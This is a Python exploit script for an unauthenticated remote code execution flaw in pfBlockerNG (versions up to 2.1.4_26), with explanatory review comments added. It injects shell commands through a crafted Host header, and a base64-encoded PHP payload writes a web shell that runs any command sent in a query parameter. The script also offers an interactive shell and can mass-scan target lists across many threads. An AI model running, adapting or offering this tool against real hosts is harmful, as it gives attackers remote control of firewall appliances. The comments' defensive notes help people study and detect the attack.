#!/usr/bin/env python3
import os
import argparse
import requests
import concurrent.futures
from rich.console import Console
from requests.packages import urllib3
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from prompt_toolkit.history import InMemoryHistory
# Silence urllib3's InsecureRequestWarning: every request in this file passes
# verify=False, so TLS certificate validation is off for the entire run.
urllib3.disable_warnings()
# Shared rich console used by every function for output and prompts.
console = Console()
def fix_url(url):
    """Return *url* with an ``https://`` scheme prepended when it has none.

    A bare host is stripped of surrounding whitespace before the scheme is
    added; a value that already contains ``://`` is returned unchanged
    (no stripping is applied in that case).
    """
    if "://" in url:
        return url
    return "https://" + url.strip()
def check_endpoint(url, silent=True):
    """Probe ``<url>/pfblockerng/www/index.php`` and return its HTTP status code.

    Args:
        url: base URL of the target, scheme included.
        silent: when False, print whether the endpoint answered 200.

    Returns:
        The integer status code of the probe response.

    NOTE(review): the raw status code is returned, and HTTP status codes are
    never 0, so a caller that tests the result for truthiness (as ``exploit``
    does) proceeds for 404/500 exactly as for 200; only an exception from the
    request stops the chain.
    NOTE(review): unlike every other request in this file, no ``timeout`` is
    passed here, so an unresponsive host can block the calling thread until
    the underlying connection attempt gives up.
    """
    # Certificate validation is disabled for this probe (see module top).
    response = requests.get('%s/pfblockerng/www/index.php' % (url), verify=False)
    if not silent:
        if response.status_code == 200:
            console.print("[bold green][+] pfBlockerNG is installed")
        else:
            console.print("[bold red][X] pfBlockerNG not installed")
    return response.status_code
def upload_shell(url, command, silent=True):
    """Send the injection request, then run *command* through the dropped file.

    The first GET carries a crafted ``Host`` header: a shell snippet that
    base64-decodes an embedded blob with ``python3.8`` and pipes the result
    into ``php``. The blob is not decoded here; judging by the requests that
    follow, the resulting PHP writes a file at
    ``/usr/local/www/system_advanced_control.php`` (the path ``delete_shell``
    removes) that executes whatever arrives in the ``c`` query parameter.
    The second GET calls that file with ``echo "Pwned";<command>`` and treats
    the string ``Pwned`` in the response body as confirmation.

    Args:
        url: base URL of the target.
        command: shell command appended after the marker echo.
        silent: when False, report progress and offer an interactive shell.

    Side effects:
        Appends *url* to the module-level ``mass_result`` list on success.
        ``mass_result`` is only created inside ``main``, so calling this
        function without going through ``main`` raises ``NameError`` at the
        append.

    Defender note: both steps are ordinary GET requests, so a ``Host`` header
    containing shell metacharacters and any request for
    ``system_advanced_control.php?c=`` are the artefacts a reverse proxy or
    web-server access log would retain.
    """
    payload = {"Host":"' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"}
    # Conditional expression used purely for its side effect (prints when not silent).
    console.print("[bold yellow][!] Uploading shell...") if not silent else None
    # Injection request; its response is discarded.
    response = requests.get(f'{url}/pfblockerng/www/index.php', headers=payload, verify=False, timeout=3)
    # Trigger request: marker echo followed by the caller's command, unencoded.
    response = requests.get(f'{url}/system_advanced_control.php?c=echo "Pwned";{command}', verify=False, timeout=3)
    # Success is judged solely on the marker appearing in the body.
    if 'Pwned' in str(response.content, 'utf-8'):
        console.print(f"[bold green][+] Host {url} is vulnerable ! [cyan]{str(response.text)}")
        mass_result.append(f"{url.strip()}")
        if not silent:
            # ``choice`` is lower-cased before the test, so the "Y" entry is
            # redundant; an empty answer (just Enter) counts as yes.
            list_choice = ["Y",'y','']
            console.print("[bold yellow][!] Do you want an interactive shell ? [[bold green]Y[/bold green]/[bold red]n[/bold red]]: ")
            choice = console.input("[bold cyan]>>> [/bold cyan]")
            if choice.lower() in list_choice:
                # Nothing runs after this returns: when the interactive loop
                # ends via ``exit`` the dropped file is left on the target.
                interactive_shell(url, silent)
            else:
                console.print("[bold yellow][!] Bye Bye !!!")
                delete_shell(url, silent)
        else:
            # Mass-scan path: clean up immediately and quietly.
            delete_shell(url)
    else:
        console.print("[bold red][x] Error uploading shell. Probably patched ", response.content) if not silent else None
def interactive_shell(url, silent):
    """Read commands from a local prompt and run each one through the dropped file.

    Args:
        url: base URL of the target.
        silent: forwarded to ``delete_shell`` when the loop ends on Ctrl-C.

    Behaviour worth knowing:
      * ``exit`` and ``clear`` are matched with substring ``in``, so any
        input whose text merely contains those words triggers them.
      * ``clear``/``cls`` run on the *local* machine via ``os.system``; the
        input is then still sent to the target unchanged.
      * ``exit`` only breaks the loop. ``delete_shell`` runs solely on
        ``KeyboardInterrupt``, and the caller does not delete either, so a
        session left with ``exit`` leaves the file on the target.
    """
    try:
        session = PromptSession(history=InMemoryHistory())
        while True:
            cmd = session.prompt(HTML('<ansired><b># </b></ansired>'))
            if "exit" in cmd:
                console.print("[bold yellow][!] Bye Bye !")
                break
            if "clear" in cmd:
                if os.name == 'posix':
                    os.system('clear')
                elif os.name == 'nt':
                    os.system('cls')
            # The input is interpolated into the query string without encoding.
            response = requests.get(f'{url}/system_advanced_control.php?c={cmd}', verify=False, timeout=3)
            console.print(f"[bold green]{str(response.text)}")
    except KeyboardInterrupt:
        console.print("[bold][yellow][!] Exited shell, deleting[/bold][/yellow]")
        delete_shell(url, silent)
def delete_shell(url, silent=True):
    """Ask the dropped file to ``rm`` itself, then optionally report success.

    The removal is issued through the same ``?c=`` parameter, so it can only
    work while the file is still present and executing commands. The
    response is not inspected, so a failed cleanup is reported as success
    when *silent* is False.

    Args:
        url: base URL of the target.
        silent: when False, print a confirmation line.
    """
    delcmd = "rm /usr/local/www/system_advanced_control.php"
    requests.get(f'{url}/system_advanced_control.php?c={delcmd}', verify=False, timeout=3)
    console.print("[bold green][+] Shell deleted") if not silent else None
def exploit(url, command, silent=True):
    """Probe the pfBlockerNG endpoint, then call ``upload_shell`` if it "succeeds".

    ``check_endpoint`` returns the HTTP status code, which is truthy for every
    real status value, so ``upload_shell`` runs for 404/500 responses as well
    as for 200; only an exception raised by the probe short-circuits here.

    Args:
        url: base URL of the target.
        command: forwarded to ``upload_shell``.
        silent: forwarded to both helpers.
    """
    if check_endpoint(url, silent):
        upload_shell(url, command, silent)
def main():
    """Parse arguments and run against a single target or a list of targets.

    Modes:
      * ``-i/--ip`` without ``-l``: single target, verbose, with the
        interactive prompt offered on success.
      * ``-l/--list``: one ``exploit`` call per deduplicated line of the file,
        run on a thread pool of ``--threads`` workers with silent output.
      * neither: print the usage text.

    ``-o/--output`` writes the collected ``mass_result`` list afterwards.

    NOTE(review): ``fix_url`` is defined above but never called, so a target
    given without a scheme is passed to ``requests`` as-is.
    NOTE(review): ``hosts`` is only bound in the ``--list`` branch, so
    ``--output`` with neither ``--ip`` nor ``--list`` reaches the summary
    line and raises ``NameError`` on ``len(hosts)`` — after the (empty)
    output file has already been written.
    NOTE(review): ``mass_result`` is declared ``global`` and created here;
    worker threads append to it concurrently with no lock, presumably
    relying on the interpreter to serialise ``list.append``.
    """
    parser = argparse.ArgumentParser(description="pfBlockerNG <= 2.1.4_26 Unauth RCE")
    parser.add_argument("-c", "--command", dest="command", type=str, default="id", help="Console Command ('id')")
    parser.add_argument("-l", "--list", dest="list", type=str, help="List of targets (list.txt)")
    parser.add_argument("-i", "--ip", dest="ip", type=str, help="Base target uri (ex. http://target-uri/)")
    parser.add_argument("-t", "--threads", default=50, type=int, help="Number of threads for mass scan")
    parser.add_argument("-o", "--output", dest="output",type=str, help="Output file (vuln.txt)")
    args = parser.parse_args()
    # Module-level result list shared with upload_shell (which appends to it).
    global mass_result
    mass_result = list()
    if args.ip and not args.list:
        exploit(args.ip, args.command, silent=False)
    elif args.list:
        with open(args.list, "r") as f:
            hosts = f.readlines()
        # dict.fromkeys de-duplicates while preserving first-seen order;
        # lines still carry their trailing newline until stripped below.
        hosts = list(dict.fromkeys(hosts))
        with concurrent.futures.ThreadPoolExecutor(max_workers=args.threads) as pool, console.status("[bold purple]Hacking The Planet",spinner="earth"):
            futures = [pool.submit(exploit, host.strip(), args.command) for host in hosts]
            # Exceptions raised inside workers are stored on the futures and
            # never re-raised, so a failing host is silently dropped.
            concurrent.futures.wait(futures)
    else:
        parser.print_help()
    if args.output and not args.ip:
        with open(args.output, "w") as f:
            for host in mass_result:
                f.write(f"{host}\n")
        console.print(f"\n[bold yellow][!] Vulnerable targets ({len(mass_result)}/{len(hosts)}) stored in {args.output}")
# Script entry point; nothing else at module level has side effects beyond
# the urllib3 warning filter and the shared console.
if __name__ == '__main__':
    main()